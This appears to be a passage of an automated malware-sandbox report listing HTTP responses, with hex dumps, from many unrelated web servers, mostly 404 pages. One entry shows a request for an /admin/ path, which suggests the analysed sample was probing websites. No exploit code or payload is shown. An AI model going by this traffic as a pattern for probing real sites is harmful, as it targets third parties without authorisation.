Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-181.ec2.internalX-Request-Id: 18898dca-c113-4e77-a143-5ea2092e8276Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-234.ec2.internalX-Request-Id: fdfcc70f-f991-49e4-ae8c-d9ffecc944b8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-88.ec2.internalX-Request-Id: 12fb08d3-8df7-4320-9aae-036c44547809Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-167.ec2.internalX-Request-Id: 3b4f90a7-9821-45a7-a5ff-3f061b4255f7Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-67.ec2.internalX-Request-Id: 0059ca8a-5d7d-4a1e-a631-34d08909dfebData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 271Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 62 76 68 72 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at bvhrs.com Port 80</address></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-167.ec2.internalX-Request-Id: bbca6acf-61ae-429f-84d6-137cf384224aData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveKeep-Alive: timeout=20Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://lumaruniformes.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 13939Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 b2 db 76 e3 c6 96 25 fa 9c fa 0a 24 7c 9c 12 bd 89 1b 6f 92 28 51 1e de be d4 71 1f df da 69 d7 ae 3e 96 07 47 00 58 00 22 15 88 80 23 02 a4 98 da fa 97 d3 8f f5 d0 0f 3d ea 0f da 3f 76 16 2e 24 41 12 90 94 99 ca 5d bb 7c 11 03 eb 32 d7 5c 73 cd cb 97 a1 08 f4 2a 03 23 d1 29 bb 3a ba 2c 7e 0c 46 78 3c 33 41 59 df ff 9b 59 c4 80 84 57 47 2f 2e 53 d0 c4 08 12 22 15 e8 99 f9 eb 2f df 58 67 e6 26 ce 49 0a 33 73 41 61 99 09 a9 4d 23 10 5c 03 c7 ba 25 0d 75 32 0b 61 41 03 b0 ca 8f be 41 39 d5 94 30 4b 05 84 c1 cc 2b 51 18 e5 37 86 04 36 33 33 29 22 ca c0 34 12 09 d1 cc 4c b4 ce d4 d4 71 e2 34 8b 6d 21 63 e7 36 e2 8e 57 35 69 aa 19 5c fd 20 0c 05 06 f0 62 a6 fc f3 3f 90 bf 91 fd f9 3f 63 ca 89 f1 ea 93 b3 81 e7 5d 18 df e5 29 91 c6 af 9c 46 42 a6 a0 2e 9d aa f3 a8 41 fe 58 0a 5f 68 75 bc a1 7e 9c 92 5b 8b a6 24 06 2b 93 50 ac 36 65 44 c6 70 6c 38 d8 b8 e5 4b 98 06 c9 89 46 c6 85 94 18 c8 32 46 03 a2 a9 e0 8e 54 ea 2f b7 29 c3 54 31 70 66 ee 11 31 5e 49 f2 47 2e 2e 8c 6f 00 c2 fd 8d 59 51 9b af 4b ed 40 a4 4e 84 65 8e f9 31 08 fc fc fa b5 11 82 c1 84 42 01 52 dc 9f 48 2a d4 13 28 e1 ff 45 b9 6a 72 53 81 a4 99 be 3a 5a 52 1e 8a a5 3d 5f 66 90 8a 37 f4 35 68 4d 79 ac 8c 99 71 67 fa 44 c1 af 92 99 d3 1a fc da b9 76 94 bd 2c 4e 7c ed 94 b2 ab 6b 04 97 70 ed 94 cd d7 8e 37 b2 5d db bd 76 4e 07 b7 a7 83 6b c7 ec 9b 70 ab b1 df ce 78 8c 1f 6a 11 bf 1f 1e 36 96 68 f8 fb 75 05 88 af e2 5b e4 32 00 73 7a 67 a2 25 50 ce b2 ad c6 2f e1 0f d5 b8 76 96 99 45 79 c0 f2 b0 18 f7 46 95 81 b2 d1 c2 5b 01 ee 6c a7 94 db 6f d4 e7 0b 90 b3 89 3d b2 3d f3 fe fe e2 c8 f9 ec a5 f1 4b 42 95 11 51 06 06 fe 92 5c 0b 2b 06 0e 12 07 87 c6 67 ce d1 cb 28 e7 41 71 d3 13 da e7 bd bb 05 9e 51 f4 55 1f 2e d6 71 23 38 81 de 9d 96 ab 32 a7 67 77 2a cf 32 21 f5 2f a0 b4 9a 42 5f 53 64 a9 49 9a 4d 4f 38 2c 8d af 10 b8 67 2f 08 cb e1 c7 e8 a4 77 7f a1 40 29 84 79 ad 85 44 b5 6c 05 fa 5b dc f9 44 f4 ff db eb 1f 7f b0 95 96 78 3b 1a ad 4e 74 af 77 8f 72 04 49 31 ee fe 7e 33 3e 3b c1 19 05 35 b0 03 5c 55 fe 0c 81 3e 71 fb 6e 1f bf 09 5f 10 bc 06 0d 75 b2 fd 4c 80 c6 89 ee 61 00 b7 66 bf e0 35 4f 34 96 bb bd 8b 6a 81 82 e5 af 94 eb e1 e0 0b 29 c9 ea 04 ec 18 39 15 a7 44 ee e4 29 d0 76 88 85 bd be 9c 9d 7c 00 27 5e 72 ea 3f 17 9b de 85 04 9d 4b 6e 68 1b d0 04 ab 93 cd 5d 51 be de 5d 9d 84 d9 6c 26 7f d3 bf df f7 b6 02 e7 6b 81 d5 92 16 f2 63 75 80 8e 32 23 46 62 73 5a 37 16 30 e6 75 1e 9e 0d 03 fc 1b 45 c3 eb 3c 02 37 ba ce 07 ae 1b e2 df 09 39 ad 22 66 67 99 bf 53 d6 fb fc a5 37 7d b9 0b 1b 46 a4 f1 1e 9a fb a9 0a a4 51 d0 7b f5 ea e5 3e b3 11 fe f5 47 2e fe 0d 26 a7 8d f7
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:40 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16Content-Length: 204Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /admin/ was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: Sucuri/CloudproxyDate: Sun, 26 Nov 2023 05:59:40 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 14013X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheSet-Cookie: PHPSESSID=38bf644626892adcd16b79fed6cf8f99; path=/Vary: Accept-EncodingX-Sucuri-Cache: MISSData Raw: 34 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 0a 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 65 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 20 20 0a 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 76 6e 64 2e 6d 69 63 72 6f 73 6f 66 74 2e 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6f 69 6d 62 72 61 75 73 61 2e 63 6f 6d 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 36 33 33 33 35 34 37 34 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6f 69 6d 62 72 61 75 73 61 2e 63 6f 6d 2f 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 36 33 33 33 35 34 37 34 30 22 20 2f 3e 0a 0a 0a 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6f 69 6d 62 72 61 75 73 61 2e 63 6f 6d 2f 74 68 65 6d 65 73 2f 61 6d 61 7a 6f 6e 61 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 74 68 65 6d 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 6f 69 6d 62 72 61 75 73 61 2e 63 6f 6d 2f 74 68 65 6d 65 73 2f 61 6d 61 7a 6f 6e 61 73 2f 61 73 73 65 74 73 2f 63 73 73 2f 71 75 69 63 6b 2d 6f 72 64 65 72 Data Ascii: 416<!doctype html><html lang="en"> <head> <meta charset="utf-8"><meta http-equiv="x-ua-compatible" content="ie=edge"> <title>404 e
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-215.ec2.internalX-Request-Id: a8075867-cb03-4190-9960-1b8336cbf9eaData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-17.ec2.internalX-Request-Id: e0e5031e-5c15-4c07-9f60-ad8d31eb8c0aData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-123-133.ec2.internalX-Request-Id: eae44be1-86d7-44c1-9a6e-538d81bea93aData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTServer: Apache/2.4.41 (Ubuntu)Content-Length: 271Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 62 76 68 72 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at bvhrs.com Port 80</address></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:41 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeAccept-Ranges: bytesVary: Accept-EncodingCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Content-Length: 1699Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 